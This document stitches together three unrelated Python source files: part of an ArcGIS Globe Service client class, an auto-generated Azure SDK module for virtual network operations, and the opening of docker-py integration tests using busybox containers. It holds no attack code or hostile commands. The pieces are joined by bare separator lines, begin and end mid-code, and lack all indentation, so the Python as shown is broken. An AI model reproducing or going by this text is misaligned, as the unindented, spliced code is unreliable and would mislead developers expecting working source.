#----------------------------------------------------------------------
@property
def subLayers(self):
"""returns the subLayers value"""
if self._subLayers is None:
self.__init()
return self._subLayers
#----------------------------------------------------------------------
@property
def minDistance(self):
"""returns the min distance value"""
if self._minDistance is None:
self.__init()
return self._minDistance
#----------------------------------------------------------------------
@property
def type(self):
"""returns the type"""
if self._type is None:
self.__init()
return self._type
#----------------------------------------------------------------------
@property
def samplingMode(self):
"""returns the sampling mode"""
if self._samplingMode is None:
self.__init()
return self._samplingMode
#----------------------------------------------------------------------
@property
def maxDistance(self):
"""returns the maximum distance"""
if self._maxDistance is None:
self.__init()
return self._maxDistance
#----------------------------------------------------------------------
@property
def id(self):
"""returns the id value"""
if self._id is None:
self.__init()
return self._id
#----------------------------------------------------------------------
@property
def layerFolderName(self):
"""returns the layer folder name"""
if self._layerFolderName is None:
self.__init()
return self._layerFolderName
########################################################################
class GlobeService(BaseAGSServer):
"""
The Globe Service resource represents a globe service published with
ArcGIS for Server. The resource provides information about the service
such as the service description and the various layers contained in the
published globe document.
"""
_url = None
_securityHandler = None
_proxy_url = None
_proxy_port = None
_json = None
_json_dict = None
_currentVersion = None
_layers = None
_serviceDescription = None
_documentInfo = None
#----------------------------------------------------------------------
def __init__(self, url,
securityHandler=None,
proxy_url=None,
proxy_port=None,
initialize=False):
"""Constructor"""
self._url = url
self._securityHandler = securityHandler
self._proxy_url = proxy_url
self._proxy_port = proxy_port
if initialize:
self.__init()
#----------------------------------------------------------------------
def __init(self):
""" inializes the properties """
params = {
"f" : "json",
}
json_dict = self._do_get(self._url, params,
securityHandler=self._securityHandler,
proxy_url=self._proxy_url,
proxy_port=self._proxy_port)
self._json_dict = json_dict
self._json = json.dumps(self._json_dict)
attributes = [attr for attr in dir(self)
if not attr.startswith('__') and \
not attr.startswith('_')]
for k,v in json_dict.iteritems():
if k in attributes:
setattr(self, "_"+ k, v)
else:
print k, " - attribute not implemented for Globe Service."
#----------------------------------------------------------------------
def __str__(self):
"""returns object as string"""
if self._json is None:
self.__init()
return self._json
#----------------------------------------------------------------------
def __iter__(self):
"""
returns key/value pair
"""
attributes = ["currentVersion",
"documentInfo",
"layers",
"serviceDescription"]
for att in attributes:
yield (att, getattr(self, att))
#----------------------------------------------------------------------
@property
def layers(self):
"""gets the globe service layers"""
if self._layers is None:
self.__init()
lyrs = []
for lyr in self._layers:
lyr['object'] = GlobeServiceLayer(url=self._url + "/%s" % lyr['id'],
securityHandler=self._securityHandler,
proxy_port=self._proxy_port,
proxy_url=self._proxy_url)
lyrs.append(lyr)
return lyrs
#----------------------------------------------------------------------
@property
def currentVersion(self):
"""returns the service current version"""
if self._currentVersion is None:
self.__init()
return self._currentVersion
#----------------------------------------------------------------------
@property
def serviceDescription(self):
"""returns the service current version"""
if self._serviceDescription is None:
self.__init()
return self._serviceDescription
#----------------------------------------------------------------------
@property
def documentInfo(self):
"""returns the service document information"""
if self._documentInfo is None:
self.__init()
return self._documentInfo
|
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
import uuid
from msrest.pipeline import ClientRawResponse
from msrestazure.azure_exceptions import CloudError
from msrest.polling import LROPoller, NoPolling
from msrestazure.polling.arm_polling import ARMPolling
from .. import models
class VirtualNetworksOperations(object):
"""VirtualNetworksOperations operations.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
:ivar api_version: Client API version. Constant value: "2017-10-01".
"""
models = models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self.api_version = "2017-10-01"
self.config = config
def _delete_initial(
self, resource_group_name, virtual_network_name, custom_headers=None, raw=False, **operation_config):
# Construct URL
url = self.delete.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualNetworkName': self._serialize.url("virtual_network_name", virtual_network_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.delete(url, query_parameters)
response = self._client.send(request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200, 202, 204]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def delete(
self, resource_group_name, virtual_network_name, custom_headers=None, raw=False, polling=True, **operation_config):
"""Deletes the specified virtual network.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_network_name: The name of the virtual network.
:type virtual_network_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns None or
ClientRawResponse<None> if raw==True
:rtype: ~msrestazure.azure_operation.AzureOperationPoller[None] or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[None]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._delete_initial(
resource_group_name=resource_group_name,
virtual_network_name=virtual_network_name,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworks/{virtualNetworkName}'}
def get(
self, resource_group_name, virtual_network_name, expand=None, custom_headers=None, raw=False, **operation_config):
"""Gets the specified virtual network by resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_network_name: The name of the virtual network.
:type virtual_network_name: str
:param expand: Expands referenced resources.
:type expand: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: VirtualNetwork or ClientRawResponse if raw=true
:rtype: ~azure.mgmt.network.v2017_10_01.models.VirtualNetwork or
~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.get.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualNetworkName': self._serialize.url("virtual_network_name", virtual_network_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('VirtualNetwork', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworks/{virtualNetworkName}'}
def _create_or_update_initial(
self, resource_group_name, virtual_network_name, parameters, custom_headers=None, raw=False, **operation_config):
# Construct URL
url = self.create_or_update.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualNetworkName': self._serialize.url("virtual_network_name", virtual_network_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(parameters, 'VirtualNetwork')
# Construct and send request
request = self._client.put(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, stream=False, **operation_config)
if response.status_code not in [200, 201]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('VirtualNetwork', response)
if response.status_code == 201:
deserialized = self._deserialize('VirtualNetwork', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def create_or_update(
self, resource_group_name, virtual_network_name, parameters, custom_headers=None, raw=False, polling=True, **operation_config):
"""Creates or updates a virtual network in the specified resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_network_name: The name of the virtual network.
:type virtual_network_name: str
:param parameters: Parameters supplied to the create or update virtual
network operation
:type parameters:
~azure.mgmt.network.v2017_10_01.models.VirtualNetwork
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns VirtualNetwork or
ClientRawResponse<VirtualNetwork> if raw==True
:rtype:
~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.network.v2017_10_01.models.VirtualNetwork]
or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[~azure.mgmt.network.v2017_10_01.models.VirtualNetwork]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._create_or_update_initial(
resource_group_name=resource_group_name,
virtual_network_name=virtual_network_name,
parameters=parameters,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
deserialized = self._deserialize('VirtualNetwork', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworks/{virtualNetworkName}'}
def _update_tags_initial(
self, resource_group_name, virtual_network_name, tags=None, custom_headers=None, raw=False, **operation_config):
parameters = models.TagsObject(tags=tags)
# Construct URL
url = self.update_tags.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualNetworkName': self._serialize.url("virtual_network_name", virtual_network_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(parameters, 'TagsObject')
# Construct and send request
request = self._client.patch(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('VirtualNetwork', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def update_tags(
self, resource_group_name, virtual_network_name, tags=None, custom_headers=None, raw=False, polling=True, **operation_config):
"""Updates a virtual network tags.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_network_name: The name of the virtual network.
:type virtual_network_name: str
:param tags: Resource tags.
:type tags: dict[str, str]
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns VirtualNetwork or
ClientRawResponse<VirtualNetwork> if raw==True
:rtype:
~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.network.v2017_10_01.models.VirtualNetwork]
or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[~azure.mgmt.network.v2017_10_01.models.VirtualNetwork]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._update_tags_initial(
resource_group_name=resource_group_name,
virtual_network_name=virtual_network_name,
tags=tags,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
deserialized = self._deserialize('VirtualNetwork', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
update_tags.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworks/{virtualNetworkName}'}
def list_all(
self, custom_headers=None, raw=False, **operation_config):
"""Gets all virtual networks in a subscription.
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: An iterator like instance of VirtualNetwork
:rtype:
~azure.mgmt.network.v2017_10_01.models.VirtualNetworkPaged[~azure.mgmt.network.v2017_10_01.models.VirtualNetwork]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
def internal_paging(next_link=None, raw=False):
if not next_link:
# Construct URL
url = self.list_all.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
else:
url = next_link
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(
request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
return response
# Deserialize response
deserialized = models.VirtualNetworkPaged(internal_paging, self._deserialize.dependencies)
if raw:
header_dict = {}
client_raw_response = models.VirtualNetworkPaged(internal_paging, self._deserialize.dependencies, header_dict)
return client_raw_response
return deserialized
list_all.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Network/virtualNetworks'}
def list(
self, resource_group_name, custom_headers=None, raw=False, **operation_config):
"""Gets all virtual networks in a resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: An iterator like instance of VirtualNetwork
:rtype:
~azure.mgmt.network.v2017_10_01.models.VirtualNetworkPaged[~azure.mgmt.network.v2017_10_01.models.VirtualNetwork]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
def internal_paging(next_link=None, raw=False):
if not next_link:
# Construct URL
url = self.list.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
else:
url = next_link
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(
request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
return response
# Deserialize response
deserialized = models.VirtualNetworkPaged(internal_paging, self._deserialize.dependencies)
if raw:
header_dict = {}
client_raw_response = models.VirtualNetworkPaged(internal_paging, self._deserialize.dependencies, header_dict)
return client_raw_response
return deserialized
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworks'}
def check_ip_address_availability(
self, resource_group_name, virtual_network_name, ip_address=None, custom_headers=None, raw=False, **operation_config):
"""Checks whether a private IP address is available for use.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_network_name: The name of the virtual network.
:type virtual_network_name: str
:param ip_address: The private IP address to be verified.
:type ip_address: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: IPAddressAvailabilityResult or ClientRawResponse if raw=true
:rtype:
~azure.mgmt.network.v2017_10_01.models.IPAddressAvailabilityResult or
~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.check_ip_address_availability.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualNetworkName': self._serialize.url("virtual_network_name", virtual_network_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
if ip_address is not None:
query_parameters['ipAddress'] = self._serialize.query("ip_address", ip_address, 'str')
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('IPAddressAvailabilityResult', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
check_ip_address_availability.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworks/{virtualNetworkName}/CheckIPAddressAvailability'}
def list_usage(
self, resource_group_name, virtual_network_name, custom_headers=None, raw=False, **operation_config):
"""Lists usage stats.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_network_name: The name of the virtual network.
:type virtual_network_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: An iterator like instance of VirtualNetworkUsage
:rtype:
~azure.mgmt.network.v2017_10_01.models.VirtualNetworkUsagePaged[~azure.mgmt.network.v2017_10_01.models.VirtualNetworkUsage]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
def internal_paging(next_link=None, raw=False):
if not next_link:
# Construct URL
url = self.list_usage.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualNetworkName': self._serialize.url("virtual_network_name", virtual_network_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
else:
url = next_link
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(
request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
return response
# Deserialize response
deserialized = models.VirtualNetworkUsagePaged(internal_paging, self._deserialize.dependencies)
if raw:
header_dict = {}
client_raw_response = models.VirtualNetworkUsagePaged(internal_paging, self._deserialize.dependencies, header_dict)
return client_raw_response
return deserialized
list_usage.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworks/{virtualNetworkName}/usages'}
|
|
# Copyright 2013 dotCloud inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import base64
import contextlib
import json
import io
import os
import shutil
import signal
import socket
import tarfile
import tempfile
import threading
import time
import unittest
import warnings
import pytest
import six
from six.moves import BaseHTTPServer
from six.moves import socketserver
import docker
from docker.errors import APIError
from docker.utils import kwargs_from_env
from .base import requires_api_version
from .test import Cleanup
# FIXME: missing tests for
# export; history; insert; port; push; tag; get; load; stats
warnings.simplefilter('error')
compare_version = docker.utils.compare_version
EXEC_DRIVER = []
def exec_driver_is_native():
global EXEC_DRIVER
if not EXEC_DRIVER:
c = docker_client()
EXEC_DRIVER = c.info()['ExecutionDriver']
c.close()
return EXEC_DRIVER.startswith('native')
def docker_client(**kwargs):
return docker.Client(**docker_client_kwargs(**kwargs))
def docker_client_kwargs(**kwargs):
client_kwargs = kwargs_from_env(assert_hostname=False)
client_kwargs.update(kwargs)
return client_kwargs
def setup_module():
c = docker_client()
c.pull('busybox')
c.close()
class BaseTestCase(unittest.TestCase):
tmp_imgs = []
tmp_containers = []
tmp_folders = []
tmp_volumes = []
def setUp(self):
if six.PY2:
self.assertRegex = self.assertRegexpMatches
self.assertCountEqual = self.assertItemsEqual
self.client = docker_client(timeout=60)
self.tmp_imgs = []
self.tmp_containers = []
self.tmp_folders = []
self.tmp_volumes = []
def tearDown(self):
for img in self.tmp_imgs:
try:
self.client.remove_image(img)
except docker.errors.APIError:
pass
for container in self.tmp_containers:
try:
self.client.stop(container, timeout=1)
self.client.remove_container(container)
except docker.errors.APIError:
pass
for folder in self.tmp_folders:
shutil.rmtree(folder)
for volume in self.tmp_volumes:
try:
self.client.remove_volume(volume)
except docker.errors.APIError:
pass
self.client.close()
#########################
# INFORMATION TESTS #
#########################
class TestVersion(BaseTestCase):
def runTest(self):
res = self.client.version()
self.assertIn('GoVersion', res)
self.assertIn('Version', res)
self.assertEqual(len(res['Version'].split('.')), 3)
class TestInfo(BaseTestCase):
def runTest(self):
res = self.client.info()
self.assertIn('Containers', res)
self.assertIn('Images', res)
self.assertIn('Debug', res)
class TestSearch(BaseTestCase):
def runTest(self):
self.client = docker_client(timeout=10)
res = self.client.search('busybox')
self.assertTrue(len(res) >= 1)
base_img = [x for x in res if x['name'] == 'busybox']
self.assertEqual(len(base_img), 1)
self.assertIn('description', base_img[0])
###################
# LISTING TESTS #
###################
class TestImages(BaseTestCase):
def runTest(self):
res1 = self.client.images(all=True)
self.assertIn('Id', res1[0])
res10 = res1[0]
self.assertIn('Created', res10)
self.assertIn('RepoTags', res10)
distinct = []
for img in res1:
if img['Id'] not in distinct:
distinct.append(img['Id'])
self.assertEqual(len(distinct), self.client.info()['Images'])
class TestImageIds(BaseTestCase):
def runTest(self):
res1 = self.client.images(quiet=True)
self.assertEqual(type(res1[0]), six.text_type)
class TestListContainers(BaseTestCase):
def runTest(self):
res0 = self.client.containers(all=True)
size = len(res0)
res1 = self.client.create_container('busybox:latest', 'true')
self.assertIn('Id', res1)
self.client.start(res1['Id'])
self.tmp_containers.append(res1['Id'])
res2 = self.client.containers(all=True)
self.assertEqual(size + 1, len(res2))
retrieved = [x for x in res2 if x['Id'].startswith(res1['Id'])]
self.assertEqual(len(retrieved), 1)
retrieved = retrieved[0]
self.assertIn('Command', retrieved)
self.assertEqual(retrieved['Command'], six.text_type('true'))
self.assertIn('Image', retrieved)
self.assertRegex(retrieved['Image'], r'busybox:.*')
self.assertIn('Status', retrieved)
#####################
# CONTAINER TESTS #
#####################
class TestCreateContainer(BaseTestCase):
def runTest(self):
res = self.client.create_container('busybox', 'true')
self.assertIn('Id', res)
self.tmp_containers.append(res['Id'])
class TestCreateContainerWithBinds(BaseTestCase):
def runTest(self):
mount_dest = '/mnt'
mount_origin = tempfile.mkdtemp()
self.tmp_folders.append(mount_origin)
filename = 'shared.txt'
shared_file = os.path.join(mount_origin, filename)
binds = {
mount_origin: {
'bind': mount_dest,
'ro': False,
},
}
with open(shared_file, 'w'):
container = self.client.create_container(
'busybox',
['ls', mount_dest], volumes={mount_dest: {}},
host_config=self.client.create_host_config(
binds=binds, network_mode='none'
)
)
container_id = container['Id']
self.client.start(container_id)
self.tmp_containers.append(container_id)
exitcode = self.client.wait(container_id)
self.assertEqual(exitcode, 0)
logs = self.client.logs(container_id)
os.unlink(shared_file)
if six.PY3:
logs = logs.decode('utf-8')
self.assertIn(filename, logs)
# FIXME: format changes in API version >= 1.20
inspect_data = self.client.inspect_container(container_id)
self.assertIn('Volumes', inspect_data)
self.assertIn(mount_dest, inspect_data['Volumes'])
self.assertEqual(mount_origin, inspect_data['Volumes'][mount_dest])
self.assertIn(mount_dest, inspect_data['VolumesRW'])
self.assertTrue(inspect_data['VolumesRW'][mount_dest])
class TestCreateContainerWithRoBinds(BaseTestCase):
def runTest(self):
mount_dest = '/mnt'
mount_origin = tempfile.mkdtemp()
self.tmp_folders.append(mount_origin)
filename = 'shared.txt'
shared_file = os.path.join(mount_origin, filename)
binds = {
mount_origin: {
'bind': mount_dest,
'ro': True,
},
}
with open(shared_file, 'w'):
container = self.client.create_container(
'busybox',
['ls', mount_dest], volumes={mount_dest: {}},
host_config=self.client.create_host_config(
binds=binds, network_mode='none'
)
)
container_id = container['Id']
self.client.start(container_id)
self.tmp_containers.append(container_id)
exitcode = self.client.wait(container_id)
self.assertEqual(exitcode, 0)
logs = self.client.logs(container_id)
os.unlink(shared_file)
if six.PY3:
logs = logs.decode('utf-8')
self.assertIn(filename, logs)
# FIXME: format changes in API version >= 1.20
inspect_data = self.client.inspect_container(container_id)
self.assertIn('Volumes', inspect_data)
self.assertIn(mount_dest, inspect_data['Volumes'])
self.assertEqual(mount_origin, inspect_data['Volumes'][mount_dest])
self.assertIn(mount_dest, inspect_data['VolumesRW'])
self.assertFalse(inspect_data['VolumesRW'][mount_dest])
@requires_api_version('1.20')
class CreateContainerWithGroupAddTest(BaseTestCase):
def test_group_id_ints(self):
container = self.client.create_container(
'busybox', 'id -G',
host_config=self.client.create_host_config(group_add=[1000, 1001])
)
self.tmp_containers.append(container)
self.client.start(container)
self.client.wait(container)
logs = self.client.logs(container)
if six.PY3:
logs = logs.decode('utf-8')
groups = logs.strip().split(' ')
self.assertIn('1000', groups)
self.assertIn('1001', groups)
def test_group_id_strings(self):
container = self.client.create_container(
'busybox', 'id -G', host_config=self.client.create_host_config(
group_add=['1000', '1001']
)
)
self.tmp_containers.append(container)
self.client.start(container)
self.client.wait(container)
logs = self.client.logs(container)
if six.PY3:
logs = logs.decode('utf-8')
